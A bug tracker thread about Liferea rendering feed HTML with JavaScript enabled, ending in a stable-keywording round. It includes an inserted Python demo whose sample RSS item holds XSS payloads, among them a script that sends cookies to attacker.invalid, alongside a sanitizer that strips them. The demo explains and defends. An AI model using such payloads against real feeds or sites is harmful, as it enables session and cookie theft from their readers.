Subject says it all. Malicious web sites have an open door, as the option to turn it off is buried in the preferences. Liferea can use the gnome browser mechanism, or several other browsers. I have not checked if the option is promoted to them, but then, if not, why have the option, at all?
A related security problem was reported in http://sourceforge.net/tracker/index.php?func=detail&aid=1543623&group_id=87005&atid=581684 and is now fixed in upstream cvs, so I'll close this when this is in the tarballs and unmasked.
Reassigning to security. Note to reporter: non security devs are not able to access the bug when you restrict it to the security group.
Micheal, please advise.
Pulling in new maintainer to advise.
According to that upstream bug, the fix went into 1.1.2; 1.2.x has been in the tree for a long time, but it can't go stable until xulrunner is stable (ppc64 and sparc holding out there). I was planning on submitting 1.2.7 for stable relatively soon, pending that xulrunner issue. I don't know a whole lot about javascript vulnerabilities. Are they important? I had thought (possibly erroneously) that javascript was fairly safe to have enabled. Is a feed reader a serious potential attack vector? Yes, it polls, but the user has to specifically subscribe to feeds. I guess security's opinion here should matter.
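An added example, not from this bug thread and not Liferea's own code, of the point the question above turns on: the HTML inside an RSS item's <description> is what a reader hands to its embedded browser widget, so if that widget runs JavaScript, anyone who can inject into a subscribed feed (a compromised site, an aggregator that relays third-party posts, a comment feed) gets script execution in the reader. The feed below is constructed for the example, and the Sanitizer class, sanitize() and item_descriptions() are hypothetical helper names, not a Liferea API.

```python
"""Constructed demo: active content in an RSS <description>, and a pass that
strips it before the HTML reaches a rendering widget. Hypothetical code."""
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Constructed RSS 2.0 feed. The <description> is escaped HTML; the XML parser
# unescapes it, and that HTML is exactly what a reader would render.
SAMPLE_FEED = """<rss version="2.0"><channel><title>demo</title>
<item><title>benign</title>
<description>&lt;p&gt;Hello &lt;a href="https://example.org/"&gt;link&lt;/a&gt;&lt;/p&gt;</description></item>
<item><title>hostile</title>
<description>&lt;p onmouseover="alert(1)"&gt;x&lt;/p&gt;&lt;script&gt;fetch('https://attacker.invalid/?c='+document.cookie)&lt;/script&gt;&lt;img src="x" onerror="alert(2)"&gt;&lt;a href="javascript:alert(3)"&gt;click&lt;/a&gt;</description></item>
</channel></rss>"""


def item_descriptions(feed_xml):
    """Return (title, description-HTML) for every item, as a reader would."""
    root = ET.fromstring(feed_xml)
    return [(i.findtext("title"), i.findtext("description") or "")
            for i in root.iter("item")]


ACTIVE_TAGS = {"script", "iframe", "object", "embed"}  # dropped with their content
URL_ATTRS = {"href", "src"}


class Sanitizer(HTMLParser):
    """Re-serialise an HTML fragment without script elements, on* handlers
    or javascript: URLs. Everything stripped is recorded in self.removed."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # > 0 while inside an active element
        self.removed = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.skip_depth += 1
            self.removed.append(f"<{tag}>")
            return
        if self.skip_depth:
            return
        kept = []
        for name, value in attrs:   # HTMLParser lowercases attribute names
            v = value or ""
            if name.startswith("on"):                      # event handler
                self.removed.append(f"{tag}@{name}")
                continue
            if name in URL_ATTRS and v.strip().lower().startswith("javascript:"):
                self.removed.append(f"{tag}@{name}=javascript:")
                continue
            kept.append(f' {name}="{html.escape(v, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)   # void elements get no closing tag

    def handle_endtag(self, tag):
        if tag in ACTIVE_TAGS:
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if not self.skip_depth:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:            # text inside <script> is dropped
            self.out.append(html.escape(data, quote=False))


def sanitize(fragment):
    """Return (clean_html, list_of_removed_things) for one item description."""
    s = Sanitizer()
    s.feed(fragment)
    s.close()
    return "".join(s.out), s.removed


if __name__ == "__main__":
    for title, desc in item_descriptions(SAMPLE_FEED):
        clean, removed = sanitize(desc)
        print(f"{title}: removed {removed}\n  {clean}")
```

The deny-list here (four element names, `on*` attributes, `javascript:` URLs) is the minimum needed to show what a feed can carry; a reader that must render feed HTML should instead allow-list the tags and attributes it wants and discard the rest, and keep JavaScript off in the widget regardless, since sanitising every feed correctly is much harder than not executing script at all.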
I don't think that is serious until there is another vulnerability. BTW, is javascript in liferea really useful?
Daniel, do you have any updates about the xulrunner issue which was blocking stabilization of 1.2.x? BTW, I agree with falco, Javascript issues are not very serious in general, though that issue should be fixed anyway.
xulrunner is now okay; the current blocker is networkmanager. No version of it is stable.
(In reply to comment #9)
> xulrunner is now okay; the current blocker is networkmanager. No version of it
> is stable.

networkmanager is stable on all needed arches, so I propose to call arches here on 1.2.23 prematurely.
Daniel, is 1.2.3 ready for stable marking?
1.2.23 is fine. I apparently accidentally committed amd64 stable by accident, so you can leave amd64 out. FTR, repoman and pcheck still complain about x86-fbsd and repoman.
Thx Daniel. Arches please test and mark stable. Target keywords are:

liferea-1.2.23.ebuild: KEYWORDS="amd64 ppc ppc64 sparc x86"

Note: amd64 is already stable but cc'ing arch team so they can actually test :-)
x86 stable
(FTR, I'm a member of the amd64 team and have, in fact, tested on amd64... I believe this should be sufficient.)
Then let's remove amd64. Though it was not obvious from your first comment that you had actually tested :-)
ppc stable
Seems to work fine on sparc. Stable!
ppc64 stable (uhmm.. late again. sorry.)
Voting time!
I vote NO.
Voting NO and closing.